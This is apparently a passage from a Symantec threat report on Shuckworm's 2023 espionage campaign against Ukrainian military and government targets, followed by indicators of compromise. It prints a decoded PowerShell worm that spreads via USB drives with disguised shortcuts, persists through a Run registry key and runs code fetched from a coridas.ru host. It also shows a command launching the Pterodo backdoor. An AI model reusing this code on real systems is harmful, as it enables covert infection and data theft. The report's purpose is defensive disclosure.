More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
- CSIDL_SYSTEMwscript.exe CSIDL_PROFILEappdatalocaltempdeprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. “usb-накопитель” translates as “usb-drive”.
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
fUNCtIon sET-lnK ($chILd) {
$nAMetxt = “foto.sAfe”.TolowER();
$NAmE = (“кОМПРОМат”, “КОРЗиНА”, “СеКРетнО” | GeT-rAnDOm).ToUPPeR();
$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +”$nAMe.LNK”);
$shoRtCuT.iConloCaTiON = “C:wiNDoWSSysteM32SHELL32.DLL,3”;
$SHOrTcUT.TArGetpAth = “c:wInDOwSsYstEm32WInDOwSpowERshellV1.0POwERShEll.ExE”.ToLoweR();
$text = “-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .$NAMetxt | OUT-STrIng))”.TOlower();
$sHORTCUT.ArGUMEnTs = $tExt;
$mYfIlE= $chIlD+”$naMeTXT”
cOPY-Item $enV:UsErprOfilEiNdEx.phP -deSTINAtION $mYfILE
$FIlE=GEt-ITEM $mYfiLE -forCe
Set-ITemPRoPERTY -pAth HkCU:soFTWareMicROsOfTWiNDowscURRENtVerSiONruN -NAME safE -valUE $env:windir’sYSTeM32wINDoWSPowErSHEllv1.0pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILeINdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE’;
coPy-item .”fOtO.safe” -dEsTInaTioN $Env:USeRprOFIleiNdEX.pHp
WHile($CoUNT -lE 2){
$urLs = ‘hTTP://’+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+’.cOriDAS.Ru’) +’/slEEP.Php’;
iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),”)
$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer “drIvETYPe=’2′”;
$Drive.naMe | FOreaCH-oBJecT{
$CHiLdS = GET-ChilDITem $drivE.nAMe
foReach($cHilDs IN $chiLDs)
if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )
sET-lnk $chILds.fUlLName
IF(($dRIVe.CapaCITY – $DriVe.fREeSPACE) -Gt 1000000){
SEt-lNK $DRivE.name
STArt-SLEeP -S 300;
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
One of the most significant things about this campaign is the targets, which include Ukrainian military, security, research, and government organizations. The attackers were observed focusing on machines that contained what appeared from file names to be sensitive military information that may be abused to support Russian kinetic war efforts.
The majority of these attacks began in February/March 2023, with the attackers maintaining a presence on some of the victim machines until May. The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information. There were indications in some organizations that the attackers were on the machines of the organizations’ human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.
This activity demonstrates that Shuckworm’s relentless focus on Ukraine continues. It seems clear that Russian nation-state-backed attack groups continue to prioritize high-value Ukrainian targets in attempts to find data that may potentially help their military operations.
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
Malicious documents
- f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
- 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
- c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
- c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
- 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
- 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
- acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
USB propagation scripts
- 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
- 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
- dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
- a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
- 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
Example of LNK files created
- 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
LNK file names
- account.rtf.lnk
- account_card.rtf.lnk
- application.rtf.lnk
- bank_accоunt.rtf.lnk
- blank_cap.rtf.lnk
- business trip.rtf.lnk
- compromising_evidence.rtf.lnk
- conduct.rtf.lnk
- cuprovod.rtf.lnk
- do_not_delete.rtf.lnk
- dsk.rtf.lnk
- encouragement.rtf.lnk
- form_new.rtf.lnk
- instructions.rtf.lnk
- journey.mdb
- letter to.rtf.lnk
- login_password.docx.lnk
- login_password.rtf.lnk
- mobilization.rtf.lnk
- my_documents.rtf.lnk
- my_photos.rtf.lnk
- not_delete.rtf.lnk
- on_account.rtf.lnk
- order.rtf.lnk
- petition.rtf.lnk
- porn_video.rtf.lnk
- pornography.rtf.lnk
- pornophoto.rtf.lnk
- proceedings.rtf.lnk
- project_sheet.rtf.lnk
- report.docx.lnk
- report.rtf.lnk
- report_note.rtf.lnk
- request.rtf.lnk
- resolution.rtf.lnk
- secret.rtf.lnk
- secretly.rtf.lnk
- service.docx.lnk
- service.rtf.lnk
- sources.rtf.lnk
- support.rtf.lnk
- weapons_list.rtf.lnk
Recent C&C infrastructure (2023)
- 45.76.141[.]166
- 159.223.112[.]245
- 140.82.56[.]186
- 159.203.164[.]194
- 45.32.94[.]58
- 45.95.232[.]33
- 139.59.109[.]100
- 164.92.245[.]246
- 45.32.101[.]6
- 140.82.18[.]48
- 216.128.140[.]45
- 146.190.127[.]238
- 207.148.74[.]68
- 195.133.88[.]19
- 146.190.60[.]230
- 84.32.190[.]137
- 206.189.154[.]168
- 188.166.4[.]128
- 104.248.54[.]250
- 165.227.76[.]84
- 66.42.104[.]158
- 161.35.95[.]47
- 149.28.125[.]56
- 143.198.50[.]118
- 66.42.126[.]121
- 64.227.72[.]210
- 81.19.140[.]147
- 165.232.77[.]197
- 146.190.117[.]209
- 134.122.51[.]47
- 143.198.152[.]232
- 140.82.47[.]181
- 159.223.102[.]109
- 170.64.188[.]146
- 155.138.194[.]244
- 45.32.88[.]90
- 89.185.84[.]32
- 64.226.84[.]229
- 206.189.14[.]94
- 24.199.84[.]132
- 45.32.41[.]115
- 84.32.188[.]69
- 206.189.128[.]172
- 170.64.168[.]228
- 161.35.238[.]148
- 170.64.138[.]138
- 178.128.86[.]43
- 206.81.28[.]5
- 178.128.231[.]180
- 45.77.115[.]67
- 136.244.65[.]253
- 143.244.190[.]199
- 159.65.176[.]121
- 192.248.154[.]154
- 209.97.175[.]128
- 147.182.240[.]58
- 146.190.212[.]239
- 143.198.135[.]132
- 45.76.202[.]102
- 142.93.108[.]1
- 46.101.127[.]147
- 134.209.0[.]136
- 138.68.110[.]19
- 167.99.215[.]50
- 161.35.232[.]118
- 88.216.210[.]3
- 165.227.121[.]87
- 165.227.48[.]59
- 108.61.211[.]250
- 89.185.84[.]48
- 167.172.69[.]123
- 89.185.84[.]50
- 206.189.0[.]134
- 68.183.200[.]0
- 178.128.16[.]170
- 95.179.144[.]161
- 164.92.222[.]8
- 45.95.233[.]80
- 78.141.239[.]24
- 149.28.181[.]232
- 24.199.107[.]218
- 45.32.184[.]140
- 167.172.20[.]159
- 84.32.190[.]31
- 164.92.185[.]60
- 84.32.131[.]38
- 137.184.178[.]46
- 206.189.149[.]103
- 157.245.176[.]123
- 45.95.232[.]92
- 45.95.232[.]29
- 170.64.150[.]90
- 89.185.84[.]45
- 140.82.16[.]120
- 84.32.185[.]136
- 134.122.43[.]175
- 195.133.88[.]55
- 84.32.191[.]147
- 78.141.238[.]136
- 45.82.13[.]84
- 159.65.248[.]0
- 84.32.34[.]69
- 170.64.146[.]194
- 45.82.13[.]22
- 45.82.13[.]23
- 134.209.33[.]42
- 199.247.8[.]115
- 84.32.128[.]239
- 173.199.70[.]238
- 138.68.174[.]177
- 178.128.213[.]177
- 143.110.180[.]68
- 167.172.144[.]127
- 165.232.165[.]42
- 45.95.232[.]51
- 149.28.98[.]149
- 104.156.230[.]193
- 104.248.86[.]158
- 134.122.51[.]47
- 134.209.182[.]221
- 139.59.60[.]191
- 140.82.11[.]60
- 140.82.47[.]181
- 140.82.50[.]37
- 143.198.135[.]132
- 143.198.53[.]203
- 147.182.250[.]33
- 149.28.130[.]189
- 149.28.181[.]232
- 149.28.98[.]149
- 155.138.194[.]244
- 157.245.69[.]118
- 158.247.204[.]242
- 159.223.102[.]109
- 159.223.23[.]23
- 164.92.72[.]212
- 165.22.72[.]74
- 165.227.76[.]84
- 165.232.120[.]169
- 167.172.58[.]96
- 167.71.67[.]58
- 170.64.136[.]186
- 170.64.140[.]214
- 170.64.156[.]98
- 178.128.228[.]252
- 188.166.176[.]39
- 188.166.7[.]140
- 193.149.176[.]26
- 195.133.88[.]55
- 202.182.116[.]135
- 202.182.98[.]100
- 206.189.80[.]216
- 207.148.72[.]173
- 31.129.22[.]46
- 31.129.22[.]48
- 31.129.22[.]50
- 45.32.101[.]6
- 45.32.117[.]62
- 45.32.158[.]96
- 45.32.62[.]100
- 45.32.88[.]90
- 45.82.13[.]84
- 45.95.232[.]33
- 45.95.232[.]74
- 45.95.233[.]80
- 5.199.161[.]29
- 64.226.84[.]229
- 64.227.64[.]163
- 66.42.104[.]158
- 68.183.200[.]0
- 78.141.239[.]24
- 78.153.139[.]7
- 81.19.140[.]147
- 84.32.131[.]47
- 84.32.188[.]13
- 95.179.144[.]161
- 95.179.245[.]185
- 216.128.178[.]248